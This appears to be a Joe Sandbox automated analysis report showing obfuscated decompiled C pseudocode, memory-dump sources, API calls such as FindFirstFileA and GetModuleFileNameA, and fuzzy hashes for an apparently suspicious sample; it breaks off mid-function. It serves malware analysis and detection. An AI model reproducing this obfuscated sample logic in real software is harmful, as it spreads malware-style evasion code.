                                                                                                                                                                                                                                                    0x010e86e8
                                                                                                                                                                                                                                                    0x010e8701
                                                                                                                                                                                                                                                    0x010e8703
                                                                                                                                                                                                                                                    0x010e870f
                                                                                                                                                                                                                                                    0x010e8715
                                                                                                                                                                                                                                                    0x010e871a
                                                                                                                                                                                                                                                    0x010e8720
                                                                                                                                                                                                                                                    0x010e8720
                                                                                                                                                                                                                                                    0x010e8723
                                                                                                                                                                                                                                                    0x010e8729
                                                                                                                                                                                                                                                    0x010e873f
                                                                                                                                                                                                                                                    0x010e873f
                                                                                                                                                                                                                                                    0x010e8742
                                                                                                                                                                                                                                                    0x010e8845

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,?,?,?,?,?,?), ref: 010E87E4
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.864930148.00000000010D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.864836901.00000000010D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.865456747.00000000010E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866524306.000000000112C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866966911.000000000116D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.867050163.000000000116F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_10d0000_CX17SY6xF6.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                                                                                                    • Opcode ID: affe5b1001670fccba452097fb57750e376e63babe75b3ea4ae0967bf9a19c0f
                                                                                                                                                                                                                                                    • Instruction ID: b93a3868e90e7c60551366f0d969763db9e47d724e0598adda1d52e6260fcc8d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: affe5b1001670fccba452097fb57750e376e63babe75b3ea4ae0967bf9a19c0f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5DA1C7B4A00109DFDB08CF98E594AAEBBF2FF88304F148269E919AB355C735E951CF54
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                    			E010D3450(intOrPtr _a4, signed int _a8, intOrPtr _a12, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                                                                    				signed int _v24;
                                                                                                                                                                                                                                                    				signed int _v28;
                                                                                                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                                                                                                    				intOrPtr _v36;
                                                                                                                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                                                                                                                    				intOrPtr _v44;
                                                                                                                                                                                                                                                    				signed int _v48;
                                                                                                                                                                                                                                                    				long _v52;
                                                                                                                                                                                                                                                    				CHAR* _v56;
                                                                                                                                                                                                                                                    				struct HINSTANCE__* _v60;
                                                                                                                                                                                                                                                    				intOrPtr _t100;
                                                                                                                                                                                                                                                    				intOrPtr _t126;
                                                                                                                                                                                                                                                    				intOrPtr _t141;
                                                                                                                                                                                                                                                    				intOrPtr _t146;
                                                                                                                                                                                                                                                    				intOrPtr* _t187;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_v8 = _a12 - 0x2598;
                                                                                                                                                                                                                                                    				_v16 = _a8;
                                                                                                                                                                                                                                                    				_v12 = _a12 + 0x1fe;
                                                                                                                                                                                                                                                    				_v24 = _a24 + 0x8a;
                                                                                                                                                                                                                                                    				_v20 = _a20 - 0x6b;
                                                                                                                                                                                                                                                    				_v28 = _a4 - 0x2633;
                                                                                                                                                                                                                                                    				if(_v20 < (_v28 ^ 0x00002622)) {
                                                                                                                                                                                                                                                    					L11:
                                                                                                                                                                                                                                                    					return _v28 + 0x2687;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				if(_v24 >= _v28 + 0x2506) {
                                                                                                                                                                                                                                                    					if(_v28 > _v20 - 0x122) {
                                                                                                                                                                                                                                                    						if( *((intOrPtr*)(_a28 + 0xbadbb1)) != ((_v8 | 0x00002674) ^ _v12)) {
                                                                                                                                                                                                                                                    							_v12 = _v12 - ((_v8 |  *(_a28 + 0x8c)) ^ 0x00002598);
                                                                                                                                                                                                                                                    							_v8 = ( *(_a28 + 0x30) |  *(_a28 + 0x3c)) ^ _v8;
                                                                                                                                                                                                                                                    							_t146 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    							_t63 = _t146 + 0xf4; // 0xd3256746
                                                                                                                                                                                                                                                    							 *0x116d668 =  *_t63 * 0x00002633 ^ 0x00002628 ^  *0x116d668;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    						_v8 = _v8 + 0x2796;
                                                                                                                                                                                                                                                    						_v12 = _v12 - 0x16e;
                                                                                                                                                                                                                                                    						_v8 = _v8 - 0x1fe;
                                                                                                                                                                                                                                                    						_v8 = _v8 + 0x14d;
                                                                                                                                                                                                                                                    						_v16 = _v16 + 0x74;
                                                                                                                                                                                                                                                    						_v48 = _v16 ^ 0x00000308;
                                                                                                                                                                                                                                                    						_v44 = _v16 + 0x25b;
                                                                                                                                                                                                                                                    						_v40 = 0x116d5f0;
                                                                                                                                                                                                                                                    						_v36 = _v16 + 0xe7;
                                                                                                                                                                                                                                                    						_v32 = _v28 + 0x2801;
                                                                                                                                                                                                                                                    						_v16 = E010D3D10(_v48, _v44, _v40, _v36, _v32);
                                                                                                                                                                                                                                                    						_t187 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						_t126 =  *0x116d650; // 0xb67e4e55
                                                                                                                                                                                                                                                    						 *0x116d650 = _t126 -  *_t187;
                                                                                                                                                                                                                                                    						_v12 = _v12 ^ 0x0000001b;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				if(_v20 > (_v24 ^ 0x00000347)) {
                                                                                                                                                                                                                                                    					if(_v8 > _v20) {
                                                                                                                                                                                                                                                    						_t100 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						if(_v8 != ( *((intOrPtr*)(_t100 + 0xbadc71)) -  *0x116d6a0 & _v24)) {
                                                                                                                                                                                                                                                    							_v60 = _v24 +  *0x116d628 ^ 0x00002796;
                                                                                                                                                                                                                                                    							_v56 = _v20 ^  *(_a28 + 0xe4) ^ 0x00002506;
                                                                                                                                                                                                                                                    							_v52 = _v24 +  *((intOrPtr*)(_a28 + 0x78));
                                                                                                                                                                                                                                                    							GetModuleFileNameA(_v60, _v56, _v52);
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    						_v8 = _v8 + 0xb1;
                                                                                                                                                                                                                                                    						_t141 =  *0x116d690; // 0xab88ba4e
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_a28 + 0x98)) = _t141;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				goto L11;
                                                                                                                                                                                                                                                    			}






















                                                                                                                                                                                                                                                    0x010d345e
                                                                                                                                                                                                                                                    0x010d3464
                                                                                                                                                                                                                                                    0x010d3470
                                                                                                                                                                                                                                                    0x010d347b
                                                                                                                                                                                                                                                    0x010d3484
                                                                                                                                                                                                                                                    0x010d3490
                                                                                                                                                                                                                                                    0x010d349e
                                                                                                                                                                                                                                                    0x010d367f
                                                                                                                                                                                                                                                    0x010d368a
                                                                                                                                                                                                                                                    0x010d368a
                                                                                                                                                                                                                                                    0x010d34b0
                                                                                                                                                                                                                                                    0x010d34c2
                                                                                                                                                                                                                                                    0x010d358b
                                                                                                                                                                                                                                                    0x010d35a3
                                                                                                                                                                                                                                                    0x010d35be
                                                                                                                                                                                                                                                    0x010d35c1
                                                                                                                                                                                                                                                    0x010d35c7
                                                                                                                                                                                                                                                    0x010d35dd
                                                                                                                                                                                                                                                    0x010d35dd
                                                                                                                                                                                                                                                    0x010d34c8
                                                                                                                                                                                                                                                    0x010d34d0
                                                                                                                                                                                                                                                    0x010d34dc
                                                                                                                                                                                                                                                    0x010d34e8
                                                                                                                                                                                                                                                    0x010d34f3
                                                                                                                                                                                                                                                    0x010d34fc
                                                                                                                                                                                                                                                    0x010d3508
                                                                                                                                                                                                                                                    0x010d3513
                                                                                                                                                                                                                                                    0x010d3516
                                                                                                                                                                                                                                                    0x010d3526
                                                                                                                                                                                                                                                    0x010d3532
                                                                                                                                                                                                                                                    0x010d3551
                                                                                                                                                                                                                                                    0x010d3554
                                                                                                                                                                                                                                                    0x010d355a
                                                                                                                                                                                                                                                    0x010d3561
                                                                                                                                                                                                                                                    0x010d356c
                                                                                                                                                                                                                                                    0x010d356c
                                                                                                                                                                                                                                                    0x010d34c2
                                                                                                                                                                                                                                                    0x010d35ee
                                                                                                                                                                                                                                                    0x010d35fa
                                                                                                                                                                                                                                                    0x010d3620
                                                                                                                                                                                                                                                    0x010d3638
                                                                                                                                                                                                                                                    0x010d3649
                                                                                                                                                                                                                                                    0x010d365e
                                                                                                                                                                                                                                                    0x010d366a
                                                                                                                                                                                                                                                    0x010d3679
                                                                                                                                                                                                                                                    0x010d3679
                                                                                                                                                                                                                                                    0x010d35fc
                                                                                                                                                                                                                                                    0x010d3605
                                                                                                                                                                                                                                                    0x010d360b
                                                                                                                                                                                                                                                    0x010d3611
                                                                                                                                                                                                                                                    0x010d3611
                                                                                                                                                                                                                                                    0x010d35fa
                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(?,?,?), ref: 010D3679
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.864930148.00000000010D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.864836901.00000000010D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.865456747.00000000010E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866524306.000000000112C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866966911.000000000116D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.867050163.000000000116F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_10d0000_CX17SY6xF6.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FileModuleName
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 514040917-0
                                                                                                                                                                                                                                                    • Opcode ID: 207e9a6de287ec551fd94d7539854548c0d2e382ecff752a953bdb2a6ad51fef
                                                                                                                                                                                                                                                    • Instruction ID: 5622d564c121412aead25ae4a6a6a7e6acc1d403670007f04dc057504b2bf57f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 207e9a6de287ec551fd94d7539854548c0d2e382ecff752a953bdb2a6ad51fef
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7971D671E00209DFDB08CF98D994AEEBBB2FF88304F508169D559AB754D735AA41CF84
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                    			E010E5EA0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a24) {
                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                                                                                                    				intOrPtr _v24;
                                                                                                                                                                                                                                                    				intOrPtr _v28;
                                                                                                                                                                                                                                                    				struct _WIN32_FIND_DATAA* _v32;
                                                                                                                                                                                                                                                    				CHAR* _v36;
                                                                                                                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                                                                                                                    				intOrPtr _t65;
                                                                                                                                                                                                                                                    				intOrPtr _t75;
                                                                                                                                                                                                                                                    				signed int _t85;
                                                                                                                                                                                                                                                    				intOrPtr _t93;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_v24 = _a24 - 0x2801;
                                                                                                                                                                                                                                                    				_v20 = _a16 - 0x139;
                                                                                                                                                                                                                                                    				_v28 = _a12 - 0x2687;
                                                                                                                                                                                                                                                    				_v16 = _a16;
                                                                                                                                                                                                                                                    				_v8 = _a12 + 0x132;
                                                                                                                                                                                                                                                    				_v40 = _a4 + 0x212;
                                                                                                                                                                                                                                                    				if(_v8 != _v16 + 0x18d) {
                                                                                                                                                                                                                                                    					_t93 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    					_t18 = _t93 + 0x3c; // 0x161485
                                                                                                                                                                                                                                                    					if( *((intOrPtr*)(_a8 + 0xb8)) >  *_t18) {
                                                                                                                                                                                                                                                    						_t75 =  *0x116d628; // 0x1
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_a8 + 0x24)) = _t75 + 0x324;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					_v8 = _v8 - 0x186;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				if(_v16 != _v20 + 0x199) {
                                                                                                                                                                                                                                                    					if(_v20 == _v24 + 0x2687) {
                                                                                                                                                                                                                                                    						_v12 =  *((intOrPtr*)(_a8 + 0x8c));
                                                                                                                                                                                                                                                    						while(_v12 >= ( *0x0116D604 & 0x000026d4)) {
                                                                                                                                                                                                                                                    							_t85 =  *0x116d68c; // 0x14b95e
                                                                                                                                                                                                                                                    							_v36 = (_t85 ^ 0x00002633) -  *((intOrPtr*)(_a8 + 0xf4));
                                                                                                                                                                                                                                                    							_t65 =  *0x116d62c; // 0x161485
                                                                                                                                                                                                                                                    							_v32 = _t65 + _v16 + _v28;
                                                                                                                                                                                                                                                    							FindFirstFileA(_v36, _v32);
                                                                                                                                                                                                                                                    							_v12 = _v12 + 3;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_a8 + 0x24)) =  *((intOrPtr*)(_a8 + 0x38)) +  *((intOrPtr*)(_a8 + 0xfc)) +  *((intOrPtr*)(_a8 + 0x24)) + 0x787;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				return _v24 + 0x2628;
                                                                                                                                                                                                                                                    			}
















                                                                                                                                                                                                                                                    0x010e5eae
                                                                                                                                                                                                                                                    0x010e5eba
                                                                                                                                                                                                                                                    0x010e5ec6
                                                                                                                                                                                                                                                    0x010e5ecc
                                                                                                                                                                                                                                                    0x010e5ed8
                                                                                                                                                                                                                                                    0x010e5ee4
                                                                                                                                                                                                                                                    0x010e5ef2
                                                                                                                                                                                                                                                    0x010e5eff
                                                                                                                                                                                                                                                    0x010e5f0c
                                                                                                                                                                                                                                                    0x010e5f0f
                                                                                                                                                                                                                                                    0x010e5f11
                                                                                                                                                                                                                                                    0x010e5f1e
                                                                                                                                                                                                                                                    0x010e5f1e
                                                                                                                                                                                                                                                    0x010e5f2a
                                                                                                                                                                                                                                                    0x010e5f2a
                                                                                                                                                                                                                                                    0x010e5f38
                                                                                                                                                                                                                                                    0x010e5f4a
                                                                                                                                                                                                                                                    0x010e5f82
                                                                                                                                                                                                                                                    0x010e5f90
                                                                                                                                                                                                                                                    0x010e5fa8
                                                                                                                                                                                                                                                    0x010e5fbd
                                                                                                                                                                                                                                                    0x010e5fc0
                                                                                                                                                                                                                                                    0x010e5fcb
                                                                                                                                                                                                                                                    0x010e5fd6
                                                                                                                                                                                                                                                    0x010e5f8d
                                                                                                                                                                                                                                                    0x010e5f8d
                                                                                                                                                                                                                                                    0x010e5f4c
                                                                                                                                                                                                                                                    0x010e5f74
                                                                                                                                                                                                                                                    0x010e5f74
                                                                                                                                                                                                                                                    0x010e5f4a
                                                                                                                                                                                                                                                    0x010e5fe9

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • FindFirstFileA.KERNEL32(010E8BBD,?,?,010E8BBD,?,?,?,?,?,?), ref: 010E5FD6
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.864930148.00000000010D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.864836901.00000000010D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.865456747.00000000010E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866524306.000000000112C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866966911.000000000116D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.867050163.000000000116F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_10d0000_CX17SY6xF6.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FileFindFirst
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1974802433-0
                                                                                                                                                                                                                                                    • Opcode ID: c3baec1f738a0ba2b4691c9fb030a7ddab9997f5b4f0def20c7b21d9e0616108
                                                                                                                                                                                                                                                    • Instruction ID: 9e3215dd151b753b3801bbbbdaf9d40cca63ff00e89de41efba7275579167a63
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c3baec1f738a0ba2b4691c9fb030a7ddab9997f5b4f0def20c7b21d9e0616108
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C0413B74A00109DFDB18CF98D994AADBBF1FF88304F14C26AE9199B385D735AA41CF84
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                    			E010DC777() {
                                                                                                                                                                                                                                                    				signed int _t3;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_t3 = GetProcessHeap();
                                                                                                                                                                                                                                                    				 *0x116e1b0 = _t3;
                                                                                                                                                                                                                                                    				return _t3 & 0xffffff00 | _t3 != 0x00000000;
                                                                                                                                                                                                                                                    			}




                                                                                                                                                                                                                                                    0x010dc777
                                                                                                                                                                                                                                                    0x010dc77f
                                                                                                                                                                                                                                                    0x010dc787

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.864930148.00000000010D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.864836901.00000000010D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.865456747.00000000010E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866524306.000000000112C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866966911.000000000116D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.867050163.000000000116F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_10d0000_CX17SY6xF6.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: HeapProcess
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 54951025-0
                                                                                                                                                                                                                                                    • Opcode ID: b3a7bdbd38f1b13827906f9cba0917ac42482c6ffc270130c1cfa97e6ddc3999
                                                                                                                                                                                                                                                    • Instruction ID: 355b5deef963733ffd2fd3b34d8cad127f39ca6ea2f0e0fa30e1329bdebe9afd
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b3a7bdbd38f1b13827906f9cba0917ac42482c6ffc270130c1cfa97e6ddc3999
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E2A02430101101CF4F50CF33D70430C3DD475005C03044734F000C5154F73D40405700
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                                                                                                                                    			E010E6710() {
                                                                                                                                                                                                                                                    				signed int _t524;
                                                                                                                                                                                                                                                    				signed int _t528;
                                                                                                                                                                                                                                                    				intOrPtr _t530;
                                                                                                                                                                                                                                                    				intOrPtr _t570;
                                                                                                                                                                                                                                                    				signed int _t584;
                                                                                                                                                                                                                                                    				intOrPtr _t600;
                                                                                                                                                                                                                                                    				signed int _t603;
                                                                                                                                                                                                                                                    				intOrPtr _t607;
                                                                                                                                                                                                                                                    				intOrPtr _t612;
                                                                                                                                                                                                                                                    				signed int _t618;
                                                                                                                                                                                                                                                    				intOrPtr _t624;
                                                                                                                                                                                                                                                    				intOrPtr _t629;
                                                                                                                                                                                                                                                    				short _t653;
                                                                                                                                                                                                                                                    				signed int _t659;
                                                                                                                                                                                                                                                    				signed int _t660;
                                                                                                                                                                                                                                                    				intOrPtr _t663;
                                                                                                                                                                                                                                                    				signed short _t673;
                                                                                                                                                                                                                                                    				intOrPtr _t716;
                                                                                                                                                                                                                                                    				signed int _t739;
                                                                                                                                                                                                                                                    				signed int _t740;
                                                                                                                                                                                                                                                    				intOrPtr _t747;
                                                                                                                                                                                                                                                    				signed int _t758;
                                                                                                                                                                                                                                                    				intOrPtr _t781;
                                                                                                                                                                                                                                                    				intOrPtr _t801;
                                                                                                                                                                                                                                                    				intOrPtr _t804;
                                                                                                                                                                                                                                                    				signed int _t824;
                                                                                                                                                                                                                                                    				signed int _t828;
                                                                                                                                                                                                                                                    				intOrPtr _t848;
                                                                                                                                                                                                                                                    				signed int _t862;
                                                                                                                                                                                                                                                    				signed int _t936;
                                                                                                                                                                                                                                                    				intOrPtr _t952;
                                                                                                                                                                                                                                                    				intOrPtr _t953;
                                                                                                                                                                                                                                                    				intOrPtr _t955;
                                                                                                                                                                                                                                                    				intOrPtr* _t958;
                                                                                                                                                                                                                                                    				void* _t960;
                                                                                                                                                                                                                                                    				void* _t961;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_t958 = _t960 - 0x60;
                                                                                                                                                                                                                                                    				_t961 = _t960 - 0xf4;
                                                                                                                                                                                                                                                    				 *((intOrPtr*)(_t958 - 8)) = 0xfcf -  *0x116df30;
                                                                                                                                                                                                                                                    				 *((intOrPtr*)(_t958 + 0xc)) =  *((intOrPtr*)( *((intOrPtr*)(_t958 + 0x7c)) + ( *0x116dee6 & 0x000000ff) * 4));
                                                                                                                                                                                                                                                    				 *((intOrPtr*)(_t958 + 8)) = 0x207b;
                                                                                                                                                                                                                                                    				_t659 =  *0x116df08; // 0x0
                                                                                                                                                                                                                                                    				 *((intOrPtr*)(_t958 + 0x34)) =  *((intOrPtr*)( *((intOrPtr*)(_t958 + 0x74)) + _t659 * 4));
                                                                                                                                                                                                                                                    				_t660 =  *0x116df14; // 0x0
                                                                                                                                                                                                                                                    				 *(_t958 + 4) =  *( *((intOrPtr*)(_t958 + 0x78)) + _t660 * 2) & 0x0000ffff;
                                                                                                                                                                                                                                                    				 *(_t958 + 0x38) =  *0x116df2c & 0x0000ffff &  *0x116df14;
                                                                                                                                                                                                                                                    				_t663 =  *0x116df20; // 0x0
                                                                                                                                                                                                                                                    				 *((intOrPtr*)(_t958 - 0x90)) =  *((intOrPtr*)(_t663 + 0xa0 +  *( *(_t958 + 0x70)) * 4));
                                                                                                                                                                                                                                                    				 *( *(_t958 + 0x70)) =  *( *(_t958 + 0x70)) + 1;
                                                                                                                                                                                                                                                    				_t801 =  *0x116dedc; // 0x0
                                                                                                                                                                                                                                                    				 *(_t958 + 0x44) =  *(_t801 +  *( *(_t958 + 0x70)) * 4) |  *0x116ded8;
                                                                                                                                                                                                                                                    				 *(_t958 + 0x54) = ( *0x116dee4 & 0x000000ff) *  *( *((intOrPtr*)(_t958 + 0x7c)) + 0x1648);
                                                                                                                                                                                                                                                    				 *((intOrPtr*)(_t958 + 0x40)) = 0x677;
                                                                                                                                                                                                                                                    				_t804 =  *0x116df0c; // 0x0
                                                                                                                                                                                                                                                    				 *(_t958 + 0x10) =  *(_t804 + 0x4e24) / 0xbef;
                                                                                                                                                                                                                                                    				 *(_t958 + 0x3c) = ( *( *((intOrPtr*)(_t958 + 0x78)) + 0x40 + ( *( *(_t958 + 0x70)) << 2) * 2) & 0x0000ffff) + 0x136d;
                                                                                                                                                                                                                                                    				 *(_t958 + 0x4c) = ( *(_t958 + 0x70))[0x319] ^ 0x00000550;
                                                                                                                                                                                                                                                    				_t673 =  *0x116def0; // 0x0
                                                                                                                                                                                                                                                    				 *0x116def0 = _t673 - 1;
                                                                                                                                                                                                                                                    				 *(_t958 + 0x5b) =  *((intOrPtr*)( *((intOrPtr*)(_t958 + 0x6c)) + ( *0x116def0 & 0x0000ffff) * 4));
                                                                                                                                                                                                                                                    				 *(_t958 - 0x94) = ( *(_t958 + 0x70))[0xdab];
                                                                                                                                                                                                                                                    				 *_t958 = 0x8b2;
                                                                                                                                                                                                                                                    				 *(_t958 + 0x48) =  *( *((intOrPtr*)(_t958 + 0x6c)) + 0x74 +  *( *(_t958 + 0x70)) * 4) % 0x1a70;
                                                                                                                                                                                                                                                    				 *((intOrPtr*)(_t958 - 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t958 + 0x74)) + 0x19d0));
                                                                                                                                                                                                                                                    				 *(_t958 + 0x5c) =  *( *((intOrPtr*)(_t958 + 0x6c)) + 0x1c +  *(_t958 + 0x48) * 4);
                                                                                                                                                                                                                                                    				while( *(_t958 + 0x5c) <  *((intOrPtr*)( *(_t958 + 0x38) + ( *( *(_t958 + 0x3c)) & 0x000000ff) * 4))) {
                                                                                                                                                                                                                                                    					asm("cdq");
                                                                                                                                                                                                                                                    					 *( *((intOrPtr*)(_t958 + 0x40)) +  *(_t958 + 0x5c) * 4) = 0xf32 %  *( *((intOrPtr*)(_t958 + 0x40)) +  *(_t958 + 0x5c) * 4);
                                                                                                                                                                                                                                                    					 *(_t958 - 0x10) =  *(_t958 + 0x5c);
                                                                                                                                                                                                                                                    					 *(_t958 - 0xc) =  *( *(_t958 + 0x44) + 0x40 +  *0x116dee0 * 3 * 2) & 0x0000ffff ^  *( *(_t958 + 0x4c) + ( *( *(_t958 + 0x54)) & 0x000000ff) * 4);
                                                                                                                                                                                                                                                    					 *( *((intOrPtr*)(_t958 - 4)) +  *( *(_t958 + 0x70)) * 4) = E010E7E80( *(_t958 - 0x10),  *(_t958 - 0xc));
                                                                                                                                                                                                                                                    					_t739 =  *0x116dee8; // 0x0
                                                                                                                                                                                                                                                    					 *((intOrPtr*)( *((intOrPtr*)(_t958 + 0x6c)) + _t739 * 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t958 + 0x74)) +  *( *(_t958 + 0x70)) * 4));
                                                                                                                                                                                                                                                    					_t740 =  *0x116dee8; // 0x0
                                                                                                                                                                                                                                                    					 *0x116dee8 = _t740 + 1;
                                                                                                                                                                                                                                                    					 *(_t958 + 0x28) =  *(_t958 + 0x5b) & 0x000000ff;
                                                                                                                                                                                                                                                    					 *(_t958 + 0x5b) =  *(_t958 + 0x5b) + 1;
                                                                                                                                                                                                                                                    					 *(_t958 - 0x2c) =  *(_t958 + 0x5c) *  *( *((intOrPtr*)(_t958 + 0x7c)) + (( *( *(_t958 + 0x54)) & 0x000000ff) << 2) * 4);
                                                                                                                                                                                                                                                    					_t600 =  *0x116df20; // 0x0
                                                                                                                                                                                                                                                    					 *(_t958 - 0x28) =  *(_t600 + 0x1c +  *(_t958 + 0x5c) * 4) | 0x000017a7;
                                                                                                                                                                                                                                                    					_t747 =  *0x116deec; // 0x0
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t958 - 0x24)) =  *((intOrPtr*)(_t747 + 0x28cc));
                                                                                                                                                                                                                                                    					 *(_t958 - 0x20) =  *(_t958 + 0x5c);
